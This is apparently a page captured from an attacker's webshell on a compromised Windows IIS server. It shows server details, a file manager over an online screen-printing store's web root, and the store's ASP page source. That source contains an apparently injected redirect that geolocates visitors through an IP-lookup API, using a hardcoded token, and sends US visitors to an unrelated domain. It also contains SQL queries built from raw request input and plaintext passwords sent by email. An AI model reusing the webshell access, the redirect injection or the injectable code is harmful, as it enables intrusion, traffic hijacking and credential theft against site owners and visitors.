Webshell Akmal archtte id

System: Microsoft Windows NT 10.0.20348.0

Server: Microsoft-IIS/10.0

User: buyyou

Directory: C:\MyData\WWW\asc365\

Name	Size	Type	Actions
ASC365_CANADA	-	Directory	Rename Delete
ASC365_Store01	-	Directory	Rename Delete
aspnet_client	-	Directory	Rename Delete
CompanyImage	-	Directory	Rename Delete
TJGS_USA	-	Directory	Rename Delete
zhijian	-	Directory	Rename Delete
Memo.inc	0 bytes	.inc	Edit Rename Delete
web.config	213 bytes	.config	Edit Rename Delete

<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=0.5, maximum-scale=2.0, user-scalable=yes" />
<meta http-equiv="Content-Language" content="zh-cn">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="google-translate-customization" content="dd9ab110111b95e8-23f17d3073499cf4-g783cd8b386774c48-19"></meta>
<script src="js/jquery-1.2.6.pack.js"></script>
<script src="js/jquery.messager.js"></script>

ip=request.ServerVariables("REMOTE_ADDR")  
datatype = "txt"
token = "b29afdfc823403449e199a339cf8ee20"    '�û����Ĳ鿴����token
url = "http://api.ip138.com/query/?ip="&ip&"&datatype="&datatype&"&token="&token

'response.Write(GetURL(url))
if instr(GetURL(url),"美国")>0 then
  response.Redirect("https://eezglobal.com")
end if

Function GetURL(url)
    on error resume next
    dim Retrieval
    Set Retrieval = Server.CreateObject("MSXML2.ServerXMLHTTP")
            Retrieval.setTimeouts 600000, 600000, 600000, 600000
            Retrieval.Open "GET", url, false
            Retrieval.Send
            GetURL = Retrieval.ResponseBody
    Set Retrieval = Nothing
    GetURL=BytesToBstr(GetURL,"utf-8")
End Function

Function BytesToBstr(strBody,CodeBase)
        dim objStream
        set objStream = Server.CreateObject("Adodb.Stream")
        objStream.Type = 1
        objStream.Mode =3
        objStream.Open
        objStream.Write strBody
        objStream.Position = 0
        objStream.Type = 2
        objStream.Charset = CodeBase
        BytesToBstr = objStream.ReadText 
        objStream.Close
        set objStream = nothing
End Function
 %>
<title>ASC365.com screen printing, home DIY printing machine, T-shirt printing machine, silk screnning supplies, 6 color 6 station screen press, 4 color 4 station screen printing machine, single color printing, screen starter, screen printing kit, flash dryer, exposure unit, screen, mesh, fabric, screen frame, t-shirt pallet plate�� squeege, emulsion scoop coater�� color pigment, plastisol, pvc ink</title>
<%

Set fs=Server.CreateObject("Scripting.FileSystemObject")
Session("GetType")=263
ID=Request.QueryString("ID")
Session("typeid")=0
'if len(ID)=0 then
'ID="FT1"
'end if
'Thispage ="http://" & Request.ServerVariables("SERVER_NAME")& Request.ServerVariables("URL")
'userip =  Request.ServerVariables("HTTP_X_FORWARDED_FOR") 
'If userip = "" Then userip = Request.ServerVariables("REMOTE_ADDR")

'if gw_gethttpstr(0,userip)="����" then
'   response.Redirect("http://usa.asc365.com")
'end if 
%>
<%'-----------------------------------------------------------------------

%>
<%
 if request("Action")="Search" then
 searchname=request.Form("Search1")
 response.redirect(Thispage&"?ID=Search&searchname="&searchname)
 end if
%>
<%
'-----����Ա���е�¼
 '��ȡ����
 
  'ɾ������
if request("Action")="deleteorder" then
orderid=request.QueryString("orderid")
set rs11=server.createobject("adodb.recordset")
sql11="select * from orderlist where orderid='"&orderid&"'"

rs11.open sql11,conn,3,3
if not rs11.eof then
rs11("orderstate")=1
rs11.update
rs11.close
set rs11=nothing
conn.close
set conn=nothing
Response.write"<script>window.location.href=""index.asp?ID=MyAsc365"";</script>"
end if
end if
  'FAQ�����ύ
  if request("Action")="AddQuestion" then
  set rs4=server.createobject("adodb.recordset")
  sql4="select count(*) as ordercount from Question"
  rs4.open sql4,conn,1,1
  newid="00000"&rs4("ordercount")
  rs4.close
  set rs4=nothing
  
  userid=Session("UserId")
  useremail12=Session("UserEmail")
  tracking=newid
  subject=request.Form("subject")
  content=request.Form("content")
  createddate=now()
  lastdate=now()
  status1=0
  set rs12=server.createobject("adodb.recordset")
  rs12.open "select * from Question",conn,1,3
  rs12.addnew
  rs12("tracking")=tracking
  rs12("subject")=subject
  rs12("content")=content
  rs12("creatdate")=createddate
  rs12("lastdate")=lastdate
  rs12("status")=status1
  rs12("userid")=UserId
  rs12("useremail")=useremail12
  rs12("source")=1
  rs12.update
  rs12.close
  conn.close
  set rs12=nothing
  set conn=nothing
  Response.write"<script>window.location.href=""index.asp?ID=MyAsc365FAQ"";</script>"
  end if
  
  '-----����Աע��
  if request("Action")="Register_email" then
    useremail2=Trim(Request.form("email2"))
    userpassword2=Trim(Request.Form("password2"))
	countryname=Request.Form("T6")
	'Md5_Pass=Md5(Md5(password1,16),32)
'-----�����ж��û��������롢��֤���Ƿ�Ϊ��
'-----�����ж���֤�롢�û����������Ƿ���ȷ����¼��¼���
    set rs=server.createobject("adodb.recordset")
    sql33="select * from UserInfo where UserEmail='"&useremail2&"' and UserType=2"
    rs.open sql33,conn,1,3
      if not rs.bof then
        Response.write"<script language=javascript>alert(""The Email Address has already been registered"");location.href='index.asp?ID=Register';</script>"
		Response.End()
	  else
	   rs.addnew
	   rs("UserName")=""
	   rs("UserPass")=userpassword2
	   rs("UserEmail")=useremail2
	   rs("UserType")=2
	   rs("UserCountry")=countryname
	   rs("Useful")=0
	   rs.update
	   rs.close
	   set rs=nothing
	   conn.close
	   set conn=nothing
	  ' D_link="http://screenprinting.asc365.com/Emailactive.asp?Email="&useremail2
	   D_link="https://asc365.com/Emailactive.asp?Email="&useremail2
	   D_message=""
	   D_message=D_message&"<table border='1' width='800' height='113' bordercolor='#CCCCCC' style='border-collapse: collapse'>" & chr(13) & chr(10)
	   D_message=D_message&"<tr>" & chr(13) & chr(10)
	   D_message=D_message&"<td height='85' width='400'><p>Dear"
	   D_message=D_message&useremail2
	   D_message=D_message&",</p>" & chr(13) & chr(10)
	   D_message=D_message&" <p>Your Password is <span  style='color:#FF0000'>"
	   D_message=D_message&"</span></p>"&chr(13)&chr(10)
	   D_message=D_message&" <p>You can click the follow Link to active your email</p></td>"&chr(13)&chr(10)
	   D_message=D_message&"<a href='"
	   D_message=D_message&D_link
	   D_message=D_message&"'>"&D_link
	   D_message=D_message&"</a>"& chr(13) & chr(10)
	   D_message=D_message&"<tr>" & chr(13) & chr(10)
	   D_message=D_message&"</table>"
	   '	set newmail=server.CreateObject("cdonts.newmail")
       '     newmail.From="sales@asc365.com"      //����������ʽ���ͣ��˷�������ͨ������˱��������֤
       '     newmail.To =useremail         //��ҵ�ʾ��ռ��˵�ַ
       '     newmail.Subject= "Message of Your Password"
       '     newmail.Body = D_message
       '     newmail.BodyFormat =0
       '     newmail.MailFormat =0
       '     newmail.Send
       '     set newmail=nothing
       MailFrom = "sales@asc365.com"
       MailTo = useremail
       MailSubject = "Message of Your Password"
       mailtext = "<html><body>" & D_message & "</body></html>"
       MySendEmail MailFrom,MailTo,MailSubject,mailtext

useremail2=""
	   Response.write"<script>alert('Thanks for your Register.Please enjoy shopping');top.location.href='index.asp?ID=Register'</script>"  
	   response.End()
      end if
    end if
%>
<%
if request("Action")="forgotPass" then
useremail=Trim(request.Form("email_address"))

set rs15=server.createobject("adodb.recordset")
 sql15="select UserEmail,UserPass from UserInfo where UserEmail='"&useremail&"'"
 rs15.open sql15,conn,1,1
 if not(rs15.bof and rs15.eof) then
       D_message=""
	   D_message=D_message&"<table border='1' width='800' height='113' bordercolor='#CCCCCC' style='border-collapse: collapse'>" & chr(13) & chr(10)
	   D_message=D_message&"<tr>" & chr(13) & chr(10)
	   D_message=D_message&"<td height='85' width='400'><p>Dear"
	   D_message=D_message&rs15("UserEmail")
	   D_message=D_message&",</p>" & chr(13) & chr(10)
	   D_message=D_message&" <p>Your Password is <span  style='color:#FF0000'>"
	   D_message=D_message&rs15("UserPass")
	   D_message=D_message&"</span></p>"&chr(13)&chr(10)
	   D_message=D_message&" <p>You can click <a href='http://asc365.com'>here </a> to go to ASC365.</p></td>"&chr(13)&chr(10)
	   D_message=D_message&"<tr>" & chr(13) & chr(10)
	   D_message=D_message&"</table>" 
	   '	set newmail=server.CreateObject("cdonts.newmail")
       '     newmail.From="sales@asc365.com"      //����������ʽ���ͣ��˷�������ͨ������˱��������֤
       '     newmail.To =useremail         //��ҵ�ʾ��ռ��˵�ַ
       '     newmail.Subject= "Message of Your Password"
       '     newmail.Body = D_message
       '     newmail.BodyFormat =0
       '     newmail.MailFormat =0
       '     newmail.Send
       '     set newmail=nothing
       set msg = nothing
       MailFrom = "sales@asc365.com"
       MailTo = useremail
       MailSubject = "Message of Your Password"
       mailtext = "<html><body>" & D_message & "</body></html>"
       MySendEmail MailFrom,MailTo,MailSubject,mailtext
            
	  Response.write"<script>alert(""The Email has been send,Please check it. "");location.href=""index.asp?ID=Register"";</script>"
	  response.End()
	else
	   Response.write"<script>alert(""The Email does not exit"");location.href=""index.asp?ID=Register"";</script>"
	   response.End()
	end if
	rs15.close
	set rs15=nothing
	conn.close
	set conn=nothing
end if
%>
<style type="text/css">

</style>
</head>